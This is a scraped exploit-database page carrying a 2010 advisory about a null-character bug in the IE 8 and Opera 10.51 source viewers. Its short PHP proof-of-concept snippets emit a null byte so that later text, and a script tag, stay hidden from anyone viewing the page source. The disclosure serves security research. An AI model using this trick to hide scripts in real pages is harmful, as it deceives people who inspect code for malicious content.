0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IE/Opera source code viewer Null Character Handling
[===================================================
IE/Opera source code viewer Null Character Handling
===================================================
# Exploit Title: IE/Opera source code viewer Null Character Handling
Vulnerability
# Date: 10/04/2010
# Author: Daniel Correa
# Software Link:
http://www.microsoft.com/windows/internet-explorer/default.aspx
# Software Link: http://www.opera.com/download/
# Version: Tested on IE 8, Opera 10.51
# Tested on: Windows XP; Windows 7 + default IE 8
# CVE :
# Description :
The vulnerability in the source code viewer in both browsers (IE &
Opera) is when they are processing the null control character (0?00),
including this character in the transmission message results in a
misunderstanding that is reflected in the concealment of the transmitted
message, only the code that is between valid tags is shown. In other
words, exploiting this vulnerability we can completely hide the source
code to the user of Internet Explorer and Opera browsers.
# Code:
The next code hide all the source code to source code viewer.
<?php
echo "\x00";
?>
Esto es un mensaje oculto
This is a hide message
Este es otro
Thie is another one
...
Como vemos podemos esconder cualquier mensaje
As we can see we can hide any message
<html>
<head>
<title>Titulo</title>
</head>
<body>
<h1>Hola mundo</h1>
</body>
</html>
And the next,only hide part of the code (The script part)
<html>
<head>
<title>Titulo</title>
</head>
<body>
<h1>Hello world</h1>
</body>
</html>
<?php
echo chr(0);
?>
<script>alert('This code is never seen');</script>
Package contain three proofs of concept:
http://www.sinfocol.org/archivos/2010/04/ie_opera_null.zip
--
Sinfocol
http://www.sinfocol.org
La informaci?n contenida en este mensaje es confidencial y puede ser legalmente privilegiada. Est? destinado ?nicamente para el destinatario. El acceso a este correo electr?nico por cualquier otra persona no est? autorizado. Si usted no es el destinatario, cualquier revelaci?n, copia, distribuci?n o cualquier acci?n u omitido que se adopten en la confianza en ?l, est? prohibida y puede ser ilegal.
The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful.
# 0day.today [2024-07-07] #